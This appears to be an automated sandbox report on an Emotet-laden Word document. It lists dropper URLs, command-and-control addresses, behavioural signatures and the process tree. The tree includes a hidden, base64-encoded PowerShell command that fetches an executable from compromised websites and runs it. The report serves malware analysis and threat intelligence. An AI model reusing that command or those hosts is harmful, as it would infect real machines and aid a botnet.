Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    16-01-2020 16:51

General

  • Target

    5c21b8911225705df6195bf0dbf4ed16a01ac8aec18c1b5041601abca1104a96

  • Sample

    200116-phfeq1n2le

  • SHA256

    5c21b8911225705df6195bf0dbf4ed16a01ac8aec18c1b5041601abca1104a96

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://guilhermebasilio.com/wp-content/LH/

exe.dropper

http://pbs.onsisdev.info/wp-content/uploads/z8Jm5LOp/

exe.dropper

http://niuconstruction.net/toolsl/k7NjE10245/

exe.dropper

http://panvelpropertyproject.com/calendar/7g6f/7g6f/

exe.dropper

http://demo.artesfide.com/cgi-bin/SXllAKyx9u/

Extracted

Family

emotet

C2

70.123.95.180:80

190.17.44.48:80

59.120.5.154:80

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

181.36.42.205:443

113.190.254.245:80

190.195.129.227:8090

50.28.51.143:8080

204.225.249.100:7080

99.252.27.6:80

185.160.229.26:80

77.55.211.77:8080

68.187.160.28:443

152.231.89.226:80

86.123.138.76:80

82.196.15.205:8080

80.11.158.65:8080

rsa_pubkey.plain

Signatures

  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5c21b8911225705df6195bf0dbf4ed16a01ac8aec18c1b5041601abca1104a96.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4956
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABKAHgAdwB5AHYAdQBhAHkAZQBnAG0AagBrAD0AJwBGAG4AaQBpAGIAZABsAHkAYQBxAHcAbgAnADsAJABOAGoAYwB3AGgAawB2AGEAIAA9ACAAJwA5ADAAMQAnADsAJABZAGMAbQBvAGoAcgB1AG0AbAB6AGkAYgA9ACcATgBlAHoAbgBlAGMAeABuAHIAagAnADsAJABEAHgAbQB0AHAAcQBrAGgAdQBpAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBqAGMAdwBoAGsAdgBhACsAJwAuAGUAeABlACcAOwAkAFoAdgBpAHoAaABjAHcAbQBoAGsAdwB2AGUAPQAnAEIAdwBqAHQAYgBjAG0AbQBsAHgAJwA7ACQATABlAGUAaQBtAGQAdgBhAGoAPQAmACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBFAGIAQwBsAGkARQBuAFQAOwAkAEMAYgBrAHQAagBnAGIAcABnAHcAaQBpAHcAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAHUAaQBsAGgAZQByAG0AZQBiAGEAcwBpAGwAaQBvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATABIAC8AKgBoAHQAdABwADoALwAvAHAAYgBzAC4AbwBuAHMAaQBzAGQAZQB2AC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AegA4AEoAbQA1AEwATwBwAC8AKgBoAHQAdABwADoALwAvAG4AaQB1AGMAbwBuAHMAdAByAHUAYwB0AGkAbwBuAC4AbgBlAHQALwB0AG8AbwBsAHMAbAAvAGsANwBOAGoARQAxADAAMgA0ADUALwAqAGgAdAB0AHAAOgAvAC8AcABhAG4AdgBlAGwAcAByAG8AcABlAHIAdAB5AHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAGMAYQBsAGUAbgBkAGEAcgAvADcAZwA2AGYALwA3AGcANgBmAC8AKgBoAHQAdABwADoALwAvAGQAZQBtAG8ALgBhAHIAdABlAHMAZgBpAGQAZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFMAWABsAGwAQQBLAHkAeAA5AHUALwAnAC4AIgBzAGAAcABMAEkAdAAiACgAJwAqACcAKQA7ACQAQQB1AGwAawBjAHUAbABzAHoAZABsAHMAPQAnAFcAZQBkAGgAZABpAGQAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAGsAYwB6AHMAYgBlAGYAcAB0AGsAIABpAG4AIAAkAEMAYgBrAHQAagBnAGIAcABnAHcAaQBpAHcAKQB7AHQAcgB5AHsAJABMAGUAZQBpAG0AZAB2AGEAagAuACIAZABPAGAAdwBuAGAATABPAEEARABmAGAASQBsAEUAIgAoACQARABrAGMAegBzAGIAZQBmAHAAdABrACwAIAAkAEQAeABtAHQAcABxAGsAaAB1AGkAegBuACkAOwAkAFAAcwB2AG0AaQB3AGMAaABqAD0AJwBXAHoAdQBhAHQAaABsAHgAbABxAG8AdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQAeABtAHQAcABxAGsAaAB1AGkAegBuACkALgAiAEwAYABFAGAATgBnAFQAaAAiACAALQBnAGUAIAAyADQAMgA0ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQBSAFQAIgAoACQARAB4AG0AdABwAHEAawBoAHUAaQB6AG4AKQA7ACQARAB0AHEAcABpAHkAdgBjAG0AYwA9ACcAUQBnAGoAawB3AGoAZQBpAGUAJwA7AGIAcgBlAGEAawA7ACQAUAB3AGcAeQBmAHMAYgB2AD0AJwBaAHQAagBxAHQAbgB0AGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAGIAdgBxAGIAZgByAG4AYQB5AGUAcABxAD0AJwBCAGEAcABrAGsAZwBhAGEAcQBuAHoAdQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Users\Admin\901.exe
      "C:\Users\Admin\901.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:4696
      • C:\Users\Admin\901.exe
        --e3d51118
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:3848

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3848-9-0x00000000009B0000-0x00000000009C7000-memory.dmp

    Filesize

    92KB

  • memory/3848-10-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/4696-6-0x0000000002650000-0x0000000002667000-memory.dmp

    Filesize

    92KB